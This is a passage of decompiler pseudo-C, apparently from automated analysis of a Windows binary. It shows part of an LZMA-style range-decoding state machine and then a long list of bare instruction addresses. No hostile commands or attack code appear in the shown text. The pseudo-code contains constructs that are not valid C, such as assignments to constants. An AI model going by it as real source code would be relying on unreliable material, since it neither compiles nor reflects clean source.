												goto L58;
											}
										case 0x10:
											L110:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0x10;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t366 = __ebp - 0x70;
											 *_t366 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t366;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											goto L112;
										case 0x11:
											L69:
											__esi =  *(__ebp - 0x58);
											 *(__ebp - 0x84) = 0x12;
											L132:
											 *(_t612 - 0x54) = _t605;
											goto L133;
										case 0x12:
											goto L0;
										case 0x13:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												_t469 = __ebp - 0x58;
												 *_t469 =  *(__ebp - 0x58) + 0x204;
												__eflags =  *_t469;
												 *(__ebp - 0x30) = 0x10;
												 *(__ebp - 0x40) = 8;
												goto L144;
											}
											__eax =  *(__ebp - 0x4c);
											__ecx =  *(__ebp - 0x58);
											__eax =  *(__ebp - 0x4c) << 4;
											 *(__ebp - 0x30) = 8;
											__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
											goto L130;
										case 0x14:
											 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
											__eax =  *(__ebp - 0x80);
											L140:
											 *(_t612 - 0x88) = _t533;
											goto L1;
										case 0x15:
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
											__al = __al & 0x000000fd;
											__eax = (__eflags >= 0) - 1 + 0xb;
											 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
											goto L121;
										case 0x16:
											__eax =  *(__ebp - 0x30);
											__eflags = __eax - 4;
											if(__eax >= 4) {
												_push(3);
												_pop(__eax);
											}
											__ecx =  *(__ebp - 4);
											 *(__ebp - 0x40) = 6;
											__eax = __eax << 7;
											 *(__ebp - 0x7c) = 0x19;
											 *(__ebp - 0x58) = __eax;
											goto L145;
										case 0x17:
											goto L145;
										case 0x18:
											L146:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0x18;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t484 = __ebp - 0x70;
											 *_t484 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t484;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L148:
											_t487 = __ebp - 0x48;
											 *_t487 =  *(__ebp - 0x48) - 1;
											__eflags =  *_t487;
											goto L149;
										case 0x19:
											__eflags = __ebx - 4;
											if(__ebx < 4) {
												 *(__ebp - 0x2c) = __ebx;
												L120:
												_t394 = __ebp - 0x2c;
												 *_t394 =  *(__ebp - 0x2c) + 1;
												__eflags =  *_t394;
												L121:
												__eax =  *(__ebp - 0x2c);
												__eflags = __eax;
												if(__eax == 0) {
													 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
													goto L170;
												}
												__eflags = __eax -  *(__ebp - 0x60);
												if(__eax >  *(__ebp - 0x60)) {
													goto L171;
												}
												 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
												__eax =  *(__ebp - 0x30);
												_t401 = __ebp - 0x60;
												 *_t401 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
												__eflags =  *_t401;
												goto L124;
											}
											__ecx = __ebx;
											__eax = __ebx;
											__ecx = __ebx >> 1;
											__eax = __ebx & 0x00000001;
											__ecx = (__ebx >> 1) - 1;
											__al = __al | 0x00000002;
											__eax = (__ebx & 0x00000001) << __cl;
											__eflags = __ebx - 0xe;
											 *(__ebp - 0x2c) = __eax;
											if(__ebx >= 0xe) {
												__ebx = 0;
												 *(__ebp - 0x48) = __ecx;
												L103:
												__eflags =  *(__ebp - 0x48);
												if( *(__ebp - 0x48) <= 0) {
													__eax = __eax + __ebx;
													 *(__ebp - 0x40) = 4;
													 *(__ebp - 0x2c) = __eax;
													__eax =  *(__ebp - 4);
													__eax =  *(__ebp - 4) + 0x644;
													__eflags = __eax;
													L109:
													__ebx = 0;
													 *(__ebp - 0x58) = __eax;
													 *(__ebp - 0x50) = 1;
													 *(__ebp - 0x44) = 0;
													 *(__ebp - 0x48) = 0;
													L113:
													__eax =  *(__ebp - 0x40);
													__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
													if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
														_t392 = __ebp - 0x2c;
														 *_t392 =  *(__ebp - 0x2c) + __ebx;
														__eflags =  *_t392;
														goto L120;
													}
													__eax =  *(__ebp - 0x50);
													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
													__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
													__eax =  *(__ebp - 0x58);
													__esi = __edi + __eax;
													 *(__ebp - 0x54) = __esi;
													__ax =  *__esi;
													__ecx = __ax & 0x0000ffff;
													__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
													__eflags =  *(__ebp - 0xc) - __edx;
													if( *(__ebp - 0xc) >= __edx) {
														__ecx = 0;
														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
														__ecx = 1;
														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
														__ebx = 1;
														__ecx =  *(__ebp - 0x48);
														__ebx = 1 << __cl;
														__ecx = 1 << __cl;
														__ebx =  *(__ebp - 0x44);
														__ebx =  *(__ebp - 0x44) | __ecx;
														__cx = __ax;
														__cx = __ax >> 5;
														__eax = __eax - __ecx;
														__edi = __edi + 1;
														__eflags = __edi;
														 *(__ebp - 0x44) = __ebx;
														 *__esi = __ax;
														 *(__ebp - 0x50) = __edi;
													} else {
														 *(__ebp - 0x10) = __edx;
														0x800 = 0x800 - __ecx;
														0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
														 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
														 *__esi = __dx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													if( *(__ebp - 0x10) >= 0x1000000) {
														L112:
														_t369 = __ebp - 0x48;
														 *_t369 =  *(__ebp - 0x48) + 1;
														__eflags =  *_t369;
														goto L113;
													} else {
														goto L110;
													}
												}
												__ecx =  *(__ebp - 0xc);
												__ebx = __ebx + __ebx;
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
												__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
													__ecx =  *(__ebp - 0x10);
													 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
													__ebx = __ebx | 0x00000001;
													__eflags = __ebx;
													 *(__ebp - 0x44) = __ebx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												if( *(__ebp - 0x10) >= 0x1000000) {
													L102:
													_t339 = __ebp - 0x48;
													 *_t339 =  *(__ebp - 0x48) - 1;
													__eflags =  *_t339;
													goto L103;
												} else {
													goto L100;
												}
											}
											__edx =  *(__ebp - 4);
											__eax = __eax - __ebx;
											 *(__ebp - 0x40) = __ecx;
											__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
											goto L109;
										case 0x1a:
											L56:
											__eflags =  *(__ebp - 0x64);
											if( *(__ebp - 0x64) == 0) {
												 *(__ebp - 0x88) = 0x1a;
												goto L170;
											}
											__ecx =  *(__ebp - 0x68);
											__al =  *(__ebp - 0x5c);
											__edx =  *(__ebp - 8);
											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
											 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
											 *( *(__ebp - 0x68)) = __al;
											__ecx =  *(__ebp - 0x14);
											 *(__ecx +  *(__ebp - 8)) = __al;
											__eax = __ecx + 1;
											__edx = 0;
											_t192 = __eax %  *(__ebp - 0x74);
											__eax = __eax /  *(__ebp - 0x74);
											__edx = _t192;
											goto L80;
										case 0x1b:
											L76:
											__eflags =  *(__ebp - 0x64);
											if( *(__ebp - 0x64) == 0) {
												 *(__ebp - 0x88) = 0x1b;
												goto L170;
											}
											__eax =  *(__ebp - 0x14);
											__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
											__eflags = __eax -  *(__ebp - 0x74);
											if(__eax >=  *(__ebp - 0x74)) {
												__eax = __eax +  *(__ebp - 0x74);
												__eflags = __eax;
											}
											__edx =  *(__ebp - 8);
											__cl =  *(__eax + __edx);
											__eax =  *(__ebp - 0x14);
											 *(__ebp - 0x5c) = __cl;
											 *(__eax + __edx) = __cl;
											__eax = __eax + 1;
											__edx = 0;
											_t275 = __eax %  *(__ebp - 0x74);
											__eax = __eax /  *(__ebp - 0x74);
											__edx = _t275;
											__eax =  *(__ebp - 0x68);
											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
											_t284 = __ebp - 0x64;
											 *_t284 =  *(__ebp - 0x64) - 1;
											__eflags =  *_t284;
											 *( *(__ebp - 0x68)) = __cl;
											L80:
											 *(__ebp - 0x14) = __edx;
											goto L81;
										case 0x1c:
											while(1) {
												L124:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													break;
												}
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__edx =  *(__ebp - 8);
												__cl =  *(__eax + __edx);
												__eax =  *(__ebp - 0x14);
												 *(__ebp - 0x5c) = __cl;
												 *(__eax + __edx) = __cl;
												__eax = __eax + 1;
												__edx = 0;
												_t415 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t415;
												__eax =  *(__ebp - 0x68);
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
												 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
												__eflags =  *(__ebp - 0x30);
												 *( *(__ebp - 0x68)) = __cl;
												 *(__ebp - 0x14) = _t415;
												if( *(__ebp - 0x30) > 0) {
													continue;
												} else {
													L81:
													 *(__ebp - 0x88) = 2;
													goto L1;
												}
											}
											 *(__ebp - 0x88) = 0x1c;
											L170:
											_push(0x22);
											_pop(_t567);
											memcpy( *(_t612 - 0x90), _t612 - 0x88, _t567 << 2);
											_t535 = 0;
											L172:
											return _t535;
									}
								}
								L171:
								_t535 = _t534 | 0xffffffff;
								goto L172;
							}
						}
						__eax =  *(__ebp - 0x50);
						 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
						__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
						__eax =  *(__ebp - 0x58);
						__esi = __edx + __eax;
						 *(__ebp - 0x54) = __esi;
						__ax =  *__esi;
						__edi = __ax & 0x0000ffff;
						__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
						if( *(__ebp - 0xc) >= __ecx) {
							 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
							__cx = __ax;
							__cx = __ax >> 5;
							__eax = __eax - __ecx;
							__edx = __edx + 1;
							 *__esi = __ax;
							 *(__ebp - 0x50) = __edx;
						} else {
							 *(__ebp - 0x10) = __ecx;
							0x800 = 0x800 - __edi;
							0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
							 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
							 *__esi = __cx;
						}
						if( *(__ebp - 0x10) >= 0x1000000) {
							goto L148;
						} else {
							goto L146;
						}
					}
					goto L1;
				}
			}








                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00407128
                                                                                                                                                                                                  0x00407128
                                                                                                                                                                                                  0x0040712c
                                                                                                                                                                                                  0x00407151
                                                                                                                                                                                                  0x0040715b
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x0040712e
                                                                                                                                                                                                  0x0040712e
                                                                                                                                                                                                  0x00407131
                                                                                                                                                                                                  0x00407135
                                                                                                                                                                                                  0x00407138
                                                                                                                                                                                                  0x0040713b
                                                                                                                                                                                                  0x0040713f
                                                                                                                                                                                                  0x0040713f
                                                                                                                                                                                                  0x00407142
                                                                                                                                                                                                  0x0040721c
                                                                                                                                                                                                  0x0040721c
                                                                                                                                                                                                  0x00407223
                                                                                                                                                                                                  0x00407223
                                                                                                                                                                                                  0x00407226
                                                                                                                                                                                                  0x0040722d
                                                                                                                                                                                                  0x0040725a
                                                                                                                                                                                                  0x0040725e
                                                                                                                                                                                                  0x004072be
                                                                                                                                                                                                  0x004072c1
                                                                                                                                                                                                  0x004072c6
                                                                                                                                                                                                  0x004072c7
                                                                                                                                                                                                  0x004072c9
                                                                                                                                                                                                  0x004072cb
                                                                                                                                                                                                  0x004072ce
                                                                                                                                                                                                  0x004071da
                                                                                                                                                                                                  0x004071da
                                                                                                                                                                                                  0x004071da
                                                                                                                                                                                                  0x00406976
                                                                                                                                                                                                  0x00406976
                                                                                                                                                                                                  0x00406976
                                                                                                                                                                                                  0x0040697f
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00406985
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00406990
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00406999
                                                                                                                                                                                                  0x0040699c
                                                                                                                                                                                                  0x0040699f
                                                                                                                                                                                                  0x004069a3
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x004069a9
                                                                                                                                                                                                  0x004069ac
                                                                                                                                                                                                  0x004069ae
                                                                                                                                                                                                  0x004069af
                                                                                                                                                                                                  0x004069b2
                                                                                                                                                                                                  0x004069b4
                                                                                                                                                                                                  0x004069b5
                                                                                                                                                                                                  0x004069b7
                                                                                                                                                                                                  0x004069ba
                                                                                                                                                                                                  0x004069bf
                                                                                                                                                                                                  0x004069c4
                                                                                                                                                                                                  0x004069cd
                                                                                                                                                                                                  0x004069e0
                                                                                                                                                                                                  0x004069e3
                                                                                                                                                                                                  0x004069ef
                                                                                                                                                                                                  0x00406a17
                                                                                                                                                                                                  0x00406a19
                                                                                                                                                                                                  0x00406a27
                                                                                                                                                                                                  0x00406a27
                                                                                                                                                                                                  0x00406a2b
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00406a1b
                                                                                                                                                                                                  0x00406a1b
                                                                                                                                                                                                  0x00406a1e
                                                                                                                                                                                                  0x00406a1f
                                                                                                                                                                                                  0x00406a1f
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00406a1b
                                                                                                                                                                                                  0x004069f5
                                                                                                                                                                                                  0x004069fa
                                                                                                                                                                                                  0x004069fa
                                                                                                                                                                                                  0x00406a03
                                                                                                                                                                                                  0x00406a0b
                                                                                                                                                                                                  0x00406a0e
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00406a14
                                                                                                                                                                                                  0x00406a14
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00406a14
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00406a31
                                                                                                                                                                                                  0x00406a31
                                                                                                                                                                                                  0x00406a35
                                                                                                                                                                                                  0x004072e1
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x004072e1
                                                                                                                                                                                                  0x00406a3e
                                                                                                                                                                                                  0x00406a4e
                                                                                                                                                                                                  0x00406a51
                                                                                                                                                                                                  0x00406a54
                                                                                                                                                                                                  0x00406a54
                                                                                                                                                                                                  0x00406a54
                                                                                                                                                                                                  0x00406a57
                                                                                                                                                                                                  0x00406a5b
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00406a5d
                                                                                                                                                                                                  0x00406a63
                                                                                                                                                                                                  0x00406a8d
                                                                                                                                                                                                  0x00406a93
                                                                                                                                                                                                  0x00406a9a
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00406a9a
                                                                                                                                                                                                  0x00406a69
                                                                                                                                                                                                  0x00406a6c
                                                                                                                                                                                                  0x00406a71
                                                                                                                                                                                                  0x00406a71
                                                                                                                                                                                                  0x00406a7c
                                                                                                                                                                                                  0x00406a84
                                                                                                                                                                                                  0x00406a87
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00406acc
                                                                                                                                                                                                  0x00406ad2
                                                                                                                                                                                                  0x00406ad5
                                                                                                                                                                                                  0x00406ae2
                                                                                                                                                                                                  0x00406aea
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00406aa1
                                                                                                                                                                                                  0x00406aa1
                                                                                                                                                                                                  0x00406aa5
                                                                                                                                                                                                  0x004072f0
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x004072f0
                                                                                                                                                                                                  0x00406ab1
                                                                                                                                                                                                  0x00406abc
                                                                                                                                                                                                  0x00406abc
                                                                                                                                                                                                  0x00406abc
                                                                                                                                                                                                  0x00406abf
                                                                                                                                                                                                  0x00406ac2
                                                                                                                                                                                                  0x00406ac5
                                                                                                                                                                                                  0x00406aca
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00407161
                                                                                                                                                                                                  0x00407161
                                                                                                                                                                                                  0x00407167
                                                                                                                                                                                                  0x0040716d
                                                                                                                                                                                                  0x00407173
                                                                                                                                                                                                  0x0040718d
                                                                                                                                                                                                  0x00407190
                                                                                                                                                                                                  0x00407196
                                                                                                                                                                                                  0x004071a1
                                                                                                                                                                                                  0x004071a1
                                                                                                                                                                                                  0x004071a3
                                                                                                                                                                                                  0x00407175
                                                                                                                                                                                                  0x00407175
                                                                                                                                                                                                  0x00407184
                                                                                                                                                                                                  0x00407188
                                                                                                                                                                                                  0x00407188
                                                                                                                                                                                                  0x004071ad
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x004071af
                                                                                                                                                                                                  0x004071b3
                                                                                                                                                                                                  0x00407362
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00407362
                                                                                                                                                                                                  0x004071bf
                                                                                                                                                                                                  0x004071c6
                                                                                                                                                                                                  0x004071ce
                                                                                                                                                                                                  0x004071d1
                                                                                                                                                                                                  0x004071d4
                                                                                                                                                                                                  0x004071d4
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00406af2
                                                                                                                                                                                                  0x00406af4
                                                                                                                                                                                                  0x00406af7
                                                                                                                                                                                                  0x00406b68
                                                                                                                                                                                                  0x00406b6b
                                                                                                                                                                                                  0x00406b6e
                                                                                                                                                                                                  0x00406b75
                                                                                                                                                                                                  0x00406b7f
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00406b7f
                                                                                                                                                                                                  0x00406af9
                                                                                                                                                                                                  0x00406afd
                                                                                                                                                                                                  0x00406b00
                                                                                                                                                                                                  0x00406b02
                                                                                                                                                                                                  0x00406b05
                                                                                                                                                                                                  0x00406b08
                                                                                                                                                                                                  0x00406b0a
                                                                                                                                                                                                  0x00406b0d
                                                                                                                                                                                                  0x00406b0f
                                                                                                                                                                                                  0x00406b14
                                                                                                                                                                                                  0x00406b17
                                                                                                                                                                                                  0x00406b1a
                                                                                                                                                                                                  0x00406b1e
                                                                                                                                                                                                  0x00406b25
                                                                                                                                                                                                  0x00406b28
                                                                                                                                                                                                  0x00406b2f
                                                                                                                                                                                                  0x00406b33
                                                                                                                                                                                                  0x00406b3b
                                                                                                                                                                                                  0x00406b3b
                                                                                                                                                                                                  0x00406b3b
                                                                                                                                                                                                  0x00406b35
                                                                                                                                                                                                  0x00406b35
                                                                                                                                                                                                  0x00406b35
                                                                                                                                                                                                  0x00406b2a
                                                                                                                                                                                                  0x00406b2a
                                                                                                                                                                                                  0x00406b2a
                                                                                                                                                                                                  0x00406b3f
                                                                                                                                                                                                  0x00406b42
                                                                                                                                                                                                  0x00406b60
                                                                                                                                                                                                  0x00406b62
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00406b44
                                                                                                                                                                                                  0x00406b44
                                                                                                                                                                                                  0x00406b47
                                                                                                                                                                                                  0x00406b4a
                                                                                                                                                                                                  0x00406b4d
                                                                                                                                                                                                  0x00406b4f
                                                                                                                                                                                                  0x00406b4f
                                                                                                                                                                                                  0x00406b4f
                                                                                                                                                                                                  0x00406b52
                                                                                                                                                                                                  0x00406b55
                                                                                                                                                                                                  0x00406b57
                                                                                                                                                                                                  0x00406b58
                                                                                                                                                                                                  0x00406b5b
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00406b5b
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00406d91
                                                                                                                                                                                                  0x00406d95
                                                                                                                                                                                                  0x00406db3
                                                                                                                                                                                                  0x00406db6
                                                                                                                                                                                                  0x00406dbd
                                                                                                                                                                                                  0x00406dc0
                                                                                                                                                                                                  0x00406dc3
                                                                                                                                                                                                  0x00406dc6
                                                                                                                                                                                                  0x00406dc9
                                                                                                                                                                                                  0x00406dcc
                                                                                                                                                                                                  0x00406dce
                                                                                                                                                                                                  0x00406dd5
                                                                                                                                                                                                  0x00406dd6
                                                                                                                                                                                                  0x00406dd8
                                                                                                                                                                                                  0x00406ddb
                                                                                                                                                                                                  0x00406dde
                                                                                                                                                                                                  0x00406de1
                                                                                                                                                                                                  0x00406de1
                                                                                                                                                                                                  0x00406de6
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00406de6
                                                                                                                                                                                                  0x00406d97
                                                                                                                                                                                                  0x00406d9a
                                                                                                                                                                                                  0x00406d9d
                                                                                                                                                                                                  0x00406da7
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00406dfb
                                                                                                                                                                                                  0x00406dff
                                                                                                                                                                                                  0x00406e22
                                                                                                                                                                                                  0x00406e25
                                                                                                                                                                                                  0x00406e28
                                                                                                                                                                                                  0x00406e32
                                                                                                                                                                                                  0x00406e01
                                                                                                                                                                                                  0x00406e01
                                                                                                                                                                                                  0x00406e04
                                                                                                                                                                                                  0x00406e07
                                                                                                                                                                                                  0x00406e0a
                                                                                                                                                                                                  0x00406e17
                                                                                                                                                                                                  0x00406e1a
                                                                                                                                                                                                  0x00406e1a
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00406e3e
                                                                                                                                                                                                  0x00406e42
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00406e48
                                                                                                                                                                                                  0x00406e4c
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00406e52
                                                                                                                                                                                                  0x00406e54
                                                                                                                                                                                                  0x00406e58
                                                                                                                                                                                                  0x00406e58
                                                                                                                                                                                                  0x00406e5b
                                                                                                                                                                                                  0x00406e5f
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00406eaf
                                                                                                                                                                                                  0x00406eb3
                                                                                                                                                                                                  0x00406eba
                                                                                                                                                                                                  0x00406ebd
                                                                                                                                                                                                  0x00406ec0
                                                                                                                                                                                                  0x00406eca
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00406eca
                                                                                                                                                                                                  0x00406eb5
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00406ed6
                                                                                                                                                                                                  0x00406eda
                                                                                                                                                                                                  0x00406ee1
                                                                                                                                                                                                  0x00406ee4
                                                                                                                                                                                                  0x00406ee7
                                                                                                                                                                                                  0x00406edc
                                                                                                                                                                                                  0x00406edc
                                                                                                                                                                                                  0x00406edc
                                                                                                                                                                                                  0x00406eea
                                                                                                                                                                                                  0x00406eed
                                                                                                                                                                                                  0x00406ef0
                                                                                                                                                                                                  0x00406ef0
                                                                                                                                                                                                  0x00406ef3
                                                                                                                                                                                                  0x00406ef6
                                                                                                                                                                                                  0x00406ef9
                                                                                                                                                                                                  0x00406ef9
                                                                                                                                                                                                  0x00406efc
                                                                                                                                                                                                  0x00406f03
                                                                                                                                                                                                  0x00406f08
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00406f96
                                                                                                                                                                                                  0x00406f96
                                                                                                                                                                                                  0x00406f9a
                                                                                                                                                                                                  0x00407338
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00407338
                                                                                                                                                                                                  0x00406fa0
                                                                                                                                                                                                  0x00406fa3
                                                                                                                                                                                                  0x00406fa6
                                                                                                                                                                                                  0x00406faa
                                                                                                                                                                                                  0x00406fad
                                                                                                                                                                                                  0x00406fb3
                                                                                                                                                                                                  0x00406fb5
                                                                                                                                                                                                  0x00406fb5
                                                                                                                                                                                                  0x00406fb5
                                                                                                                                                                                                  0x00406fb8
                                                                                                                                                                                                  0x00406fbb
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00406b8b
                                                                                                                                                                                                  0x00406b8b
                                                                                                                                                                                                  0x00406b8f
                                                                                                                                                                                                  0x004072fc
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x004072fc
                                                                                                                                                                                                  0x00406b95
                                                                                                                                                                                                  0x00406b98
                                                                                                                                                                                                  0x00406b9b
                                                                                                                                                                                                  0x00406b9f
                                                                                                                                                                                                  0x00406ba2
                                                                                                                                                                                                  0x00406ba8
                                                                                                                                                                                                  0x00406baa
                                                                                                                                                                                                  0x00406baa
                                                                                                                                                                                                  0x00406baa
                                                                                                                                                                                                  0x00406bad
                                                                                                                                                                                                  0x00406bb0
                                                                                                                                                                                                  0x00406bb0
                                                                                                                                                                                                  0x00406bb3
                                                                                                                                                                                                  0x00406bb6
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00406bbc
                                                                                                                                                                                                  0x00406bc2
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00406bc8
                                                                                                                                                                                                  0x00406bc8
                                                                                                                                                                                                  0x00406bcc
                                                                                                                                                                                                  0x00406bcf
                                                                                                                                                                                                  0x00406bd2
                                                                                                                                                                                                  0x00406bd5
                                                                                                                                                                                                  0x00406bd8
                                                                                                                                                                                                  0x00406bd9
                                                                                                                                                                                                  0x00406bdc
                                                                                                                                                                                                  0x00406bde
                                                                                                                                                                                                  0x00406be4
                                                                                                                                                                                                  0x00406be7
                                                                                                                                                                                                  0x00406bea
                                                                                                                                                                                                  0x00406bed
                                                                                                                                                                                                  0x00406bf0
                                                                                                                                                                                                  0x00406bf3
                                                                                                                                                                                                  0x00406bf6
                                                                                                                                                                                                  0x00406c12
                                                                                                                                                                                                  0x00406c15
                                                                                                                                                                                                  0x00406c18
                                                                                                                                                                                                  0x00406c1b
                                                                                                                                                                                                  0x00406c22
                                                                                                                                                                                                  0x00406c26
                                                                                                                                                                                                  0x00406c28
                                                                                                                                                                                                  0x00406c2c
                                                                                                                                                                                                  0x00406bf8
                                                                                                                                                                                                  0x00406bf8
                                                                                                                                                                                                  0x00406bfc
                                                                                                                                                                                                  0x00406c04
                                                                                                                                                                                                  0x00406c09
                                                                                                                                                                                                  0x00406c0b
                                                                                                                                                                                                  0x00406c0d
                                                                                                                                                                                                  0x00406c0d
                                                                                                                                                                                                  0x00406c2f
                                                                                                                                                                                                  0x00406c36
                                                                                                                                                                                                  0x00406c39
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00406c3f
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00406c3f
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00406c44
                                                                                                                                                                                                  0x00406c44
                                                                                                                                                                                                  0x00406c48
                                                                                                                                                                                                  0x00407308
